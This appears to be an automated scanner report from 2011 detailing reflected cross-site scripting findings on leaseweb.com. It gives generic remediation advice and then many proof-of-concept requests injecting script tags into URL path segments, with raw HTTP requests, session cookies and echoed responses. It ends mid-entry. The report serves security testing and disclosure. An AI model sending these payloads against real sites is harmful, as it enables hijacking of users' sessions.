Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a21a"><script>alert(1)</script>e9b4983878a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en7a21a"><script>alert(1)</script>e9b4983878a HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:36:48 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/en7a21a"><script>alert(1)</script>e9b4983878a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940ec"><script>alert(1)</script>2071b7b58a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en940ec"><script>alert(1)</script>2071b7b58a0/shopping-cart HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:36:23 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14041
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/en940ec"><script>alert(1)</script>2071b7b58a0/shopping-cart"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1082"><script>alert(1)</script>57876b17905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/shopping-cartd1082"><script>alert(1)</script>57876b17905 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:37:14 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 13906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="en_link" href="/en/shopping-cartd1082"><script>alert(1)</script>57876b17905"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77893"><script>alert(1)</script>d352239b194f822b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b0f6"><script>alert(1)</script>7635ac06e00d08672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbf64"><script>alert(1)</script>83fcdd24711b53e65 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d668"><script>alert(1)</script>620112c08e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en6d668"><script>alert(1)</script>620112c08e0/vps/express-cloud HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:44:53 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/en6d668"><script>alert(1)</script>620112c08e0/vps/express-cloud"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1af6"><script>alert(1)</script>317bdcdc48b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/vpse1af6"><script>alert(1)</script>317bdcdc48b/express-cloud HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:47:03 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 13916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="en_link" href="/en/vpse1af6"><script>alert(1)</script>317bdcdc48b/express-cloud"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bbba"><script>alert(1)</script>564ba9b85 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/vps/express-cloud9bbba"><script>alert(1)</script>564ba9b85 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:49:21 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 13912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="en_link" href="/en/vps/express-cloud9bbba"><script>alert(1)</script>564ba9b85"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7ecf"><script>alert(1)</script>6e9355aecd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /enc7ecf"><script>alert(1)</script>6e9355aecd7/vps/express-cloud/configurator/1314 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en/vps/express-cloud User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:47:01 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14089
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/enc7ecf"><script>alert(1)</script>6e9355aecd7/vps/express-cloud/configurator/1314"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ade0"><script>alert(1)</script>d5851fcaebd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/vps1ade0"><script>alert(1)</script>d5851fcaebd/express-cloud/configurator/1314 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en/vps/express-cloud User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:48:55 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 13952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="en_link" href="/en/vps1ade0"><script>alert(1)</script>d5851fcaebd/express-cloud/configurator/1314"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccf0"><script>alert(1)</script>a583e0096d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/vps/express-cloud9ccf0"><script>alert(1)</script>a583e0096d6/configurator/1314 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en/vps/express-cloud User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:50:16 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 13952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="en_link" href="/en/vps/express-cloud9ccf0"><script>alert(1)</script>a583e0096d6/configurator/1314"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984fb"><script>alert(1)</script>a17f095b3c2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/vps/express-cloud/configurator984fb"><script>alert(1)</script>a17f095b3c2/1314 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en/vps/express-cloud User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:51:27 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 13952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="en_link" href="/en/vps/express-cloud/configurator984fb"><script>alert(1)</script>a17f095b3c2/1314"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65081"><script>alert(1)</script>3b28089c87c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/vps/express-cloud/configurator/131465081"><script>alert(1)</script>3b28089c87c HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en/vps/express-cloud User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:52:21 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 13952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="en_link" href="/en/vps/express-cloud/configurator/131465081"><script>alert(1)</script>3b28089c87c"> ...[SNIP]...
1.15. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.leaseweb.com
Path:
/en/vps/express-cloud/configurator/1314
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05f0"><script>alert(1)</script>a26b52493b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/vps/express-cloud/configurator/1314?c05f0"><script>alert(1)</script>a26b52493b2=1 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en/vps/express-cloud User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f976"><script>alert(1)</script>5000c7ae558 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /flash4f976"><script>alert(1)</script>5000c7ae558/lsw_banner_hp.swf HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:37:43 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/flash4f976"><script>alert(1)</script>5000c7ae558/lsw_banner_hp.swf"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea376"><script>alert(1)</script>0945beb5808 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /flash/lsw_banner_hp.swfea376"><script>alert(1)</script>0945beb5808 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:39:05 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/flash/lsw_banner_hp.swfea376"><script>alert(1)</script>0945beb5808"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b30d3"><script>alert(1)</script>f39597e52b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /flashb30d3"><script>alert(1)</script>f39597e52b9/lsw_product.swf HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
HTTP/1.1 404 Not Found Date: Mon, 18 Apr 2011 17:37:55 GMT Server: Apache Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl"> <head> < ...[SNIP]... <a class="en_link" href="/flashb30d3"><script>alert(1)</script>f39597e52b9/lsw_product.swf"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e2b6"><script>alert(1)</script>bd542982b78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /flash/lsw_product.swf9e2b6"><script>alert(1)</script>bd542982b78 HTTP/1.1 Host: www.leaseweb.com Proxy-Connection: keep-alive Referer: http://www.leaseweb.com/en Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133
Response
